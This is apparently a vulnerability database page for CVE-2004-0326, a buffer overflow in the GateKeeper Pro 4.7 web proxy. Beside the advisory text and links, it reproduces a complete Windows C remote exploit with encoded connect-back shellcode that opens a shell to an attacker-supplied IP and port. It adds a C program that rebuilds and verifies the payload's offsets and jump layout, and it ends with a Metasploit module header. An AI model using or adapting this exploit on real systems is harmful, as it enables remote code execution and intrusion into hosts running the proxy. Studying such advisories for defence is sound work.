CVE-2004-0326
CVSS 10.0
Published: 2004-11-23 00:00:00
Revised: 2017-07-10 21:30:04

[Original] Buffer overflow in the web proxy for GateKeeper Pro 4.7 allows remote attackers to execute arbitrary code via a long GET request.


[CNNVD] Proxy-Pro Professional GateKeeper Web Proxy Buffer Overflow Vulnerability (CNNVD-200411-100)

        
        Proxy-Pro Professional GateKeeper is a proxy server that handles several protocols.
        The web proxy component of Proxy-Pro Professional GateKeeper contains a buffer overflow. A remote attacker triggers it by sending an HTTP GET request with an over-long URL through the web proxy; a crafted request can execute arbitrary code on the system with the privileges of the GateKeeper process.
        

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

Product and version information (CPE) not available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0326
(official source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0326
(official source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200411-100
(official source) CNNVD

- Other links and resources

http://lists.grok.org.uk/pipermail/full-disclosure/2004-February/017703.html
(UNKNOWN)  FULLDISC  20040222 GateKeeper Pro 4.7 buffer overflow
http://marc.info/?l=bugtraq&m=107755692400728&w=2
(UNKNOWN)  BUGTRAQ  20040222 GateKeeper Pro 4.7 buffer overflow
http://www.securityfocus.com/bid/9716
(VENDOR_ADVISORY)  BID  9716
https://exchange.xforce.ibmcloud.com/vulnerabilities/15277
(UNKNOWN)  XF  gatekeeper-long-get-bo(15277)

- Vulnerability information

Proxy-Pro Professional GateKeeper Web Proxy Buffer Overflow Vulnerability
Severity: Critical    Type: Boundary condition error
Published: 2004-11-23 00:00:00    Updated: 2005-10-20 00:00:00
Attack vector: Remote

- Advisories and patches

        Vendor patch:
        Proxy-Pro
        ---------
        The vendor has not released a patch or upgrade yet. Users of this software should watch the vendor's homepage for a new version:
        
        http://www.proxy-pro.com/professional/index.html

- Vulnerability information (155)

GateKeeper Pro 4.7 web proxy Remote Buffer Overflow Exploit (EDBID:155)
Platform: windows    Type: remote
Date: 2004-02-26    Verified
Port: 3128    Author: kralor
/*================[CRPT - FrenchTeam] =================*
  [Coromputer Security Advisory] - [CRPTSA-01]
 *=================== [Summary] =====================*
  Software : GateKeeper Pro 4.7
  Platforms : win32
  Risk : High
  Impact : Buffer overflow
  Release Date : 2004-02-23

 *=================== [Description] ====================*
  There is a trivial buffer overflow in the web proxy (default port 3128).

 *==================== [Details] ======================*
  Sending GET http://host.com/AAAAAAAAAA...(~4100bytes) will cause an access
  violation. Other services not tested, but they can be vulnerable too. Exact
  version can be checked from the administration service (default port 2000).

 *==================== [Exploits] ======================*
 /*****************************************************************/
 /* [Crpt]   GateKeeper Pro 4.7 remote sploit by kralor   [Crpt]  */
 /*****************************************************************/
 /* bug discovered & coded by: kralor [from coromputer]           */
 /* tested on: win2k pro and winXP                                */
 /* it uses a static offset to hijack execution to the shellcode..*/
 /* so it is 100% universal. Nothing more to say..                */
 /*****************************************************************/
 /* informations: www coromputer net irc undernet #coromputer     */
 /*****************************************************************/

 #include <stdio.h>
 #include <stdlib.h>
 #include <string.h>
 #include <windows.h>
 #include <winsock.h>

 #pragma comment (lib,"ws2_32")

 #define PORT 3128
 #define ADMIN_PORT 2000
 #define VERSION "4.7.0"
 #define RET_POS 4079              /* offset of the saved return address in the body */
 #define SIZE 4105                 /* body bytes sent after REQ */
 #define RET_ADDR 0x03b1e121       /* jmp ebx inside the GateKeeper image */
 #define REQ  "GET http://www.microsoft.com/"
 #define REQ2 "\r\nHost: www.microsoft.com\r\n\r\n"
 // sequence of 4 opcodes
 #define HOP 0xd4 // host opcode
 #define POP 0xd7 // port opcode

 /* connect to host:port; returns the socket, or 0 on failure */
 int cnx(char *host, int port)
 {
     int sock;
     struct sockaddr_in yeah;
     struct hostent *she;

     sock=socket(AF_INET,SOCK_STREAM,0);
     if(sock==INVALID_SOCKET) {
         printf("error: unable to create socket\r\n");
         return 0;
     }
     yeah.sin_family=AF_INET;
     yeah.sin_addr.s_addr=inet_addr(host);
     yeah.sin_port=htons((u_short)port);

     /* accept either a hostname or a dotted-quad address */
     if((she=gethostbyname(host))!=NULL) {
         memcpy((char *)&yeah.sin_addr,she->h_addr,she->h_length);
     } else {
         if((yeah.sin_addr.s_addr=inet_addr(host))==INADDR_NONE) {
             printf("error: cannot resolve host\r\n");
             return 0;
         }
     }
     printf("[+] Connecting to %-30s ...",host);
     if(connect(sock,(struct sockaddr*)&yeah,sizeof(yeah))!=0) {
         printf("error: connection refused\r\n");
         return 0;
     }
     printf("Done\r\n");
     return sock;
 }


 void banner(void)
 {
     printf("\r\n\t  [Crpt] GateKeeper Pro 4.7 remote sploit by kralor [Crpt]\r\n");
     printf("\t\t www.coromputer.net && undernet #coromputer\r\n\r\n");
     return;
 }


 void syntax(char *prog)
 {
     printf("syntax: %s <host> <your_ip> <your_port>\r\n",prog);
     exit(0);
 }

 int main(int argc, char *argv[])
 {
     WSADATA wsaData;
     int sock;
     char buffer[1024],useme[SIZE],*ptr;
     unsigned long host,port;
     unsigned int i;
     char shellc0de[] =   /* sizeof(shellc0de+xorer) == 332 bytes */
     /* classic xorer */
     "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66"
     "\xb9\x33\x01\x80\x33\x95\x43\xe2\xfa"
     /* shellc0de */
     "\x1e\x61\xc0\xc3\xf1\x34\xa5"
     "\x95\x95\x95\x1e\xd5\x99\x1e\xe5\x89\x38\x1e\xfd\x9d\x7e\x95\x1e"
     "\x50\xcb\xc8\x1c\x93\x6a\xa3\xfd\x1b\xdb\x9b\x79\x7d\x38\x95\x95"
     "\x95\xfd\xa6\xa7\x95\x95\xfd\xe2\xe6\xa7\xca\xc1\x6a\x45\x1e\x6d"
     "\xc2\xfd\x4c\x9c\x60\x38\x7d\x06\x95\x95\x95\xa6\x5c\xc4\xc4\xc4"
     "\xc4\xd4\xc4\xd4\xc4\x6a\x45\x1c\xd3\xb1\xc2\xfd\x79\x6c\x3f\xf5"
     "\x7d\xec\x95\x95\x95\xfd\xd4\xd4\xd4\xd4\xfd\xd7\xd7\xd7\xd7\x1e"
     "\x59\xff\x85\xc4\x6a\xe3\xb1\x6a\x45\xfd\xf6\xf8\xf1\x95\x1c\xf3"
     "\xa5\x6a\xa3\xfd\xe7\x6b\x26\x83\x7d\xc4\x95\x95\x95\x1c\xd3\x8b"
     "\x16\x79\xc1\x18\xa9\xb1\xa6\x55\xa6\x5c\x16\x54\x80\x3e\x77\x68"
     "\x53\xd1\xb1\x85\xd1\x6b\xd1\xb1\xa8\x6b\xd1\xb1\xa9\x1e\xd3\xb1"
     "\x1c\xd1\xb1\xdd\x1c\xd1\xb1\xd9\x1c\xd1\xb1\xc5\x18\xd1\xb1\x85"
     "\xc1\xc5\xc4\xc4\xc4\xff\x94\xc4\xc4\x6a\xe3\xa5\xc4\x6a\xc3\x8b"
     "\x6a\xa3\xfd\x7a\x5b\x75\xf5\x7d\x97\x95\x95\x95\x6a\x45\xc6\xc0"
     "\xc3\xc2\x1e\xf9\xb1\x8d\x1e\xd0\xa9\x1e\xc1\x90\xed\x96\x40\x1e"
     "\xdf\x8d\x1e\xcf\xb5\x96\x48\x76\xa7\xdc\x1e\xa1\x1e\x96\x60\xa6"
     "\x6a\x69\xa6\x55\x39\xaf\x51\xe1\x92\x54\x5a\x98\x96\x6d\x7e\x67"
     "\xae\xe9\xb1\x81\xe0\x74\x1e\xcf\xb1\x96\x48\xf3\x1e\x99\xde\x1e"
     "\xcf\x89\x96\x48\x1e\x91\x1e\x96\x50\x7e\x97\xa6\x55\x1e\x40\xca"
     "\xcb\xc8\xce\x57\x91\x95";

     banner();

     if(argc!=4)
         syntax(argv[0]);
     /* connect-back ip/port, xored with 0x95 like the rest of the shellcode */
     host=inet_addr(argv[2])^0x95959595;
     port=atoi(argv[3]);
     if(port<=0||port>65535) {
         printf("error: <port> must be between 1 and 65535\r\n");
         return -1;
     }
     port=htons((unsigned short)port);
     port=port<<16;
     port+=0x0002;                 /* AF_INET: the dword is a sockaddr_in prefix */
     port=port^0x95959595;

     /* patch the 4x HOP / 4x POP placeholders in the shellcode */
     for(i=0;i+3<sizeof(shellc0de);i++) {
         if((unsigned char)shellc0de[i]==HOP&&(unsigned char)shellc0de[i+1]==HOP)
             if((unsigned char)shellc0de[i+2]==HOP&&(unsigned char)shellc0de[i+3]==HOP) {
                 memcpy(&shellc0de[i],&host,4);
                 host=0;
             }
         if((unsigned char)shellc0de[i]==POP&&(unsigned char)shellc0de[i+1]==POP)
             if((unsigned char)shellc0de[i+2]==POP&&(unsigned char)shellc0de[i+3]==POP) {
                 memcpy(&shellc0de[i],&port,4);
                 port=0;
             }
     }
     if(host||port) {
         printf("[i] error: unable to find ip/port sequence in shellc0de\r\n");
         return -1;
     }

     if(WSAStartup(0x0101,&wsaData)!=0) {
         printf("[i] error: unable to load winsock\r\n");
         return -1;
     }
     /* the admin service banner ("GateKeeper@<version>") confirms the build */
     printf("[-] Getting version through administration interface\r\n");
     sock=cnx(argv[1],ADMIN_PORT);
     if(!sock)
         printf("[i] warning: couldn't connect to admin int to get version, trying anyway\r\n");
     else {
         send(sock,"I'm a script kiddie\r\n",21,0);
         memset(buffer,0,sizeof(buffer));
         recv(sock,buffer,sizeof(buffer)-1,0);
         memset(buffer,0,sizeof(buffer));
         recv(sock,buffer,sizeof(buffer)-1,0);
         ptr=strstr(buffer,"GateKeeper@");
         if(!ptr)
             printf("[i] warning: version not found, trying anyway\r\n");
         else {
             ptr+=11;
             if(strncmp(ptr,VERSION,strlen(VERSION))) {
                 printf("[i] error: wrong version\r\n");
                 return -1;
             }
             printf("[i] %-44s ...OK\r\n","version");
         }
     }
     printf("[i] Starting to exploit\r\n");
     sock=cnx(argv[1],PORT);
     if(!sock)
         return -1;
     printf("[i] Preparing magic %-28s ...","packet");
     /* layout: NOP sled, shellcode 0x8ac bytes below the return address,
        saved EIP -> jmp ebx, 8 bytes of sled, then a jmp back into the sled */
     memset(useme,0x90,SIZE);
     memcpy(&useme[RET_POS-0x8ac],shellc0de,sizeof(shellc0de));
     *(unsigned long*)&useme[RET_POS] = RET_ADDR; // eip pointing to jmp ebx in exe memory
     memcpy(&useme[RET_POS+12],"\xe9\xed\xf6\xff\xff",5); // jmp $ - 0x92c
     printf("Done\r\n");
     printf("[i] Sending magic packet                         ...");
     send(sock,REQ,strlen(REQ),0);
     send(sock,useme,sizeof(useme),0);
     send(sock,REQ2,strlen(REQ2),0);
     printf("Done\r\n");
     closesocket(sock);
     return 0;
 }

 *================================= [Solutions] =================================*
  No solution, wait for Infopulse to read this advisory and release a patch.

 *================================= [Workaround] ================================*
  block undesired access to port 3128 (or uninstall the software and use a real
  proxy coded by real coders).

 *================================== [Credits] ==================================*
  Discovered and coded by Ivan Rodriguez Almuina <kralor@coromputer.net>

 *================================= [Disclaimer] ================================*
  The information within this paper may change without notice.
  Use of this information constitutes acceptance for use in an AS IS condition.
  There are NO warranties with respect to this information.
  In no event shall the author be liable for any damages whatsoever arising out
  of or in connection with the use or spread of this information.
  Any use of this information is at the user's own risk.

 *================================== [Feedback] =================================*
  Please send suggestions, updates, and comments to :
  irc : #coromputer on undernet
  url : http://www.coromputer.net
  mail : kralor@coromputer.net

\*============================\* www.coromputer.net */===========================*/

// milw0rm.com [2004-02-26]
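
The layout the exploit above relies on, reconstructed as an added example (not part of the advisory or of kralor's code) so the offset arithmetic can be checked without a target: the body is sent after the 29-byte "GET http://www.microsoft.com/" prefix, the saved return address sits at body offset 4079 and is overwritten with the jmp ebx address 0x03b1e121, the shellcode is placed 0x8ac bytes below it (offset 1859), and an E9 rel32 at offset 4091 jumps back. Decoding that displacement by hand (0xfffff6ed, i.e. -0x913 from the end of the instruction) puts the landing point at offset 1773, 86 bytes of 0x90 sled before the shellcode. The constants are taken from the exploit; the function names, the 0xcc placeholder standing in for the real shellcode, and the invariants checked are assumptions of this example.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

/* Constants from the advisory exploit. */
#define RET_POS   4079                 /* offset of the saved return address in the body */
#define SIZE      4105                 /* body bytes sent after the GET prefix */
#define RET_ADDR  0x03b1e121UL         /* jmp ebx inside the GateKeeper image */
#define SC_POS    (RET_POS - 0x8ac)    /* shellcode start: 1859 */
#define JMP_POS   (RET_POS + 12)       /* E9 rel32 stub: 4091 */
#define SC_LEN    332                  /* sizeof(shellc0de) in the exploit */

static const unsigned char jmp_back[5] = { 0xe9, 0xed, 0xf6, 0xff, 0xff };

/* Lay out the body exactly as the exploit does: NOP sled everywhere, the
 * shellcode 0x8ac bytes below the return address, the return address in
 * little-endian order, 8 bytes of sled, then the jump back. */
void build_body(unsigned char *body, const unsigned char *sc, size_t sclen)
{
    memset(body, 0x90, SIZE);
    memcpy(body + SC_POS, sc, sclen);
    body[RET_POS + 0] = (unsigned char)(RET_ADDR & 0xff);
    body[RET_POS + 1] = (unsigned char)((RET_ADDR >> 8) & 0xff);
    body[RET_POS + 2] = (unsigned char)((RET_ADDR >> 16) & 0xff);
    body[RET_POS + 3] = (unsigned char)((RET_ADDR >> 24) & 0xff);
    memcpy(body + JMP_POS, jmp_back, sizeof jmp_back);
}

/* Decode an E9 rel32 at 'pos' and return the body offset it transfers to.
 * x86 adds the signed 32-bit displacement to the address of the *next*
 * instruction; the bytes are decoded by hand so the result does not depend
 * on the host's endianness. Returns -1 if there is no E9 at pos. */
long jmp_rel32_target(const unsigned char *body, size_t pos)
{
    uint32_t raw;
    int32_t disp;
    if (pos + 5 > SIZE || body[pos] != 0xe9)
        return -1;
    raw = (uint32_t)body[pos + 1] | ((uint32_t)body[pos + 2] << 8)
        | ((uint32_t)body[pos + 3] << 16) | ((uint32_t)body[pos + 4] << 24);
    disp = raw < 0x80000000u ? (int32_t)raw : -(int32_t)(0xffffffffu - raw) - 1;
    return (long)(pos + 5) + disp;
}

/* Little-endian dword stored in the return-address slot. */
unsigned long saved_ret(const unsigned char *body)
{
    return (unsigned long)body[RET_POS] | ((unsigned long)body[RET_POS + 1] << 8)
         | ((unsigned long)body[RET_POS + 2] << 16) | ((unsigned long)body[RET_POS + 3] << 24);
}

/* Invariants the layout relies on: the shellcode ends before the return
 * address slot (it must not clobber it), the jump stub decodes, it lands at
 * or below the shellcode start, and every byte between the landing point and
 * the shellcode is a NOP so execution slides in. Returns the sled length on
 * success, -1 on any violation. */
long check_layout(const unsigned char *body, size_t sclen)
{
    long target = jmp_rel32_target(body, JMP_POS);
    long i;
    if (SC_POS + sclen > RET_POS)
        return -1;
    if (target < 0 || target > SC_POS)
        return -1;
    for (i = target; i < SC_POS; i++)
        if (body[i] != 0x90)
            return -1;
    return SC_POS - target;
}

/* Build a demo body with a constructed placeholder (0xcc int3 bytes, same
 * length as the real shellcode, which is deliberately not reproduced). */
static void demo_body(unsigned char *body)
{
    unsigned char placeholder[SC_LEN];
    memset(placeholder, 0xcc, sizeof placeholder);
    build_body(body, placeholder, sizeof placeholder);
}

long demo_jmp_target(void)
{
    unsigned char body[SIZE];
    demo_body(body);
    return jmp_rel32_target(body, JMP_POS);
}

long demo_sled_length(void)
{
    unsigned char body[SIZE];
    demo_body(body);
    return check_layout(body, SC_LEN);
}

unsigned long demo_saved_ret(void)
{
    unsigned char body[SIZE];
    demo_body(body);
    return saved_ret(body);
}

int main(void)
{
    printf("jmp stub at %d lands at body offset %ld\n", JMP_POS, demo_jmp_target());
    printf("shellcode at %d, sled length %ld, ret slot 0x%08lx\n",
           SC_POS, demo_sled_length(), demo_saved_ret());
    return 0;
}
```

The same check_layout() call is the thing to rerun after changing any of the constants (a different RET_POS from a new crash, a longer payload): a negative result means the payload would either overwrite its own return address or jump somewhere other than the sled.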

- Vulnerability information (16692)

Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow (EDBID:16692)
Platform: windows    Type: remote
Date: 2010-09-20    Verified
Port: 3128    Author: metasploit
##
# $Id: proxypro_http_get.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in Proxy-Pro Professional
				GateKeeper 4.7. By sending a long HTTP GET to the default port
				of 3128, a remote attacker could overflow a buffer and execute
				arbitrary code.
			},
			'References'     =>
				[
					[ 'CVE', '2004-0326' ],
					[ 'BID', '9716' ],
				]
		))
	end

	# The module's target and exploit definitions are not reproduced in this listing.
end
